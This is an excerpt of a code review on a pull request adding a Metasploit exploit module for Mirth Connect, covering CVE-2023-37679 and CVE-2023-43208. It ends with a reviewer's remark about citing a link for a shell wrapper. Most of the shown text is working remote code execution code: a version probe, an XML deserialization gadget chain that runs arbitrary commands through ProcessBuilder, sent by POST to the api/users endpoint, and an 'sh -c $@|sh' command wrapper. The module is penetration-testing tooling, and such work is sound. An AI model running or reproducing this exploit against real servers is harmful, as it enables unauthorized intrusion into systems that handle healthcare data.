modules/exploits/multi/http/mirth_connect_cve_2023_43208.rb

```diff
@@ -0,0 +1,243 @@
+
+    if target_version <= Rex::Version.new('4.3.0')
+      return CheckCode::Appears("Version #{target_version} is affected by CVE-2023-37679.")
+    elsif target_version <= Rex::Version.new('4.4.0')
+      return CheckCode::Appears("Version #{target_version} is affected by CVE-2023-43208.")
+    end
+
+    CheckCode::Safe("Version #{target_version} is not affected.")
+  end
+
+  def get_target_version
+    return @target_version if @target_version
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/server/version'),
+      'headers' => {
+        'X-Requested-With' => 'OpenAPI'
+      }
+    )
+    return nil unless res&.code == 200
+    return nil unless res.body =~ /(\d+(\.\d+)*)/
+
+    @target_version = Rex::Version.new(Regexp.last_match(1))
+    @target_version
+  end
+
+  def exploit
+    target_version = get_target_version
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    if target_version <= Rex::Version.new('4.3.0')
+      # The CVE-2023-43208 gadget chain will also work here but use the old one to verify the original vulnerability
+      # which did not implement the deny-list logic that was bypassed by the newer chain
+      execute_command_cve_2023_37679(payload.encoded)
+    elsif target_version <= Rex::Version.new('4.4.0')
+      execute_command_cve_2023_43208(payload.encoded)
+    else
+      fail_with(Failure::NoTarget, "Version #{target_version} is not vulnerable.")
+    end
+  end
+
+  def execute_command_cve_2023_37679(cmd, _opts = {})
+    # Tested on 4.1.1 and 4.3.0
+    xml = Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <sorted-set>
+        <string>#{rand_text_alphanumeric(4..12)}</string>
+        <dynamic-proxy>
+          <interface>java.lang.Comparable</interface>
+          <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
+            <target class="java.lang.ProcessBuilder">
+              <command>
+                <string>#{target['Platform'] == 'win' ? 'cmd.exe' : 'sh'}</string>
+                <string>#{target['Platform'] == 'win' ? '/c' : '-c'}</string>
+                <string>#{cmd.encode(xml: :text)}</string>
+              </command>
+            </target>
+            <methodName>start</methodName>
+            <eventTypes/>
+          </handler>
+        </dynamic-proxy>
+      </sorted-set>
+    XML
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/users'),
+      'ctype' => 'application/xml',
+      'headers' => {
+        'X-Requested-With' => 'OpenAPI'
+      },
+      'data' => xml
+    })
+
+    res&.code == 500
+  end
+
+  def execute_command_cve_2023_43208(cmd, _opts = {})
+    if target['Platform'] == 'win'
+      cmd = "cmd.exe /c \"#{cmd}\""
+    else
+      cmd = "sh -c $@|sh . echo #{cmd}"
```

Comment:
Not sure it's necessary to reference this link each time we use this pattern, though I know we have in the past 🤷 
```suggestion
      # https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html
      cmd = "sh -c $@|sh . echo #{cmd}"
```